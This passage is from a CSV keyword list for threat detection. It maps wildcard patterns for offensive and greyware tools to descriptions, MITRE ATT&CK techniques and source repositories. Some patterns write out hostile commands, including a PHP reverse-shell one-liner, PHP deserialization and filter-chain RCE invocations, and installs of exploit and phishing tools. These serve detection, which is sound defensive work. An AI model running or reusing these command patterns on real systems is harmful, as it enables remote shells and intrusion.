T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*phant0m-exe.*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m-master.zip*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*phant0m-rdll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*phantom_thread * shc *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*PhantomService.csproj*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*PhantomService.exe*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily 
removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*phish_test.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*phish_windows_credentials.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Phish-Creds.ps1*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*phishery*","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1210 - T1565 - T1564.001","TA0002 - TA0007 - TA0010","N/A","N/A","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","10","947","208","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z" +"*phishing-HTML-linter.*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*phishlets *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" 
+"*phising_attack.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*PhoenixMiner.exe*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PhoenixMiner_*_Windows\*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. 
The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*phoneinfoga scan -n *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PhoneInfoga*","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","10632","3055","2023-10-02T04:05:36Z","2018-10-25T09:19:47Z" +"*photon.py -u * -l 3 -t 100 --wayback*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*php -f *.php -- -o myShell.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*php_filter_chain_generator --chain *php system*'cmd']*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*php_passthru_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_popen_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_proc_open_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*PHP-Code-injection.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*PHP-Code-Injections-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*phpggc -l*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - 
?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*phpggc monolog/rce1 assert 'phpinfo()'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*phpggc symfony/rce1 id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*phpmyadmin_credsteal.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PhpSploit*","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2024","452","2023-08-23T13:08:08Z","2014-05-21T19:43:03Z" +"*phra/Pezor/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*phuip-fpizdam*","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1766","261","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" +"*piata_ssh_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PIC-Exec*runshellcode.asm*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*PIC-Exec\addresshunter*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*PIC-Get-Privileges*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*-PID * -Assembly * -Arguments *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*ping -n 10 localhost > nul*","greyware_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*pingcastle*","offensive_tool_keyword","pingcastle","active directory weakness scan","T1018 - T1046 - T1069 - T1087 - T1136 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.pingcastle.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PingCastle.cs*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","0","N/A","N/A",,"N/A",,, +"*PingCastle.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 
- TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*ping-sweep*","offensive_tool_keyword","ping-sweep","Wrapper around the ping utility included by the OS. used for recon actiivities","T1016 - T1046","TA0007","N/A","N/A","Information Gathering","https://github.com/libresec/ping-sweep","1","0","N/A","N/A","1","1","0","2016-08-22T15:16:01Z","2016-08-22T02:07:46Z" +"*PinoyWH1Z/AoratosWin*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*PinoyWH1Z/AoratosWin*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*pip install exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pip install rarce*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*pip install --user fee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*pip* install updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*pip3 install bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*pip3 install -U pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*'pipename_stager'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*PipeViewer.csproj*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*PipeViewer_v1.1.zip*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*PipeViewer-main*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*pipx install fee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without 
dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*Pitty Tiger RAT*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*pivot_smb \*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - 
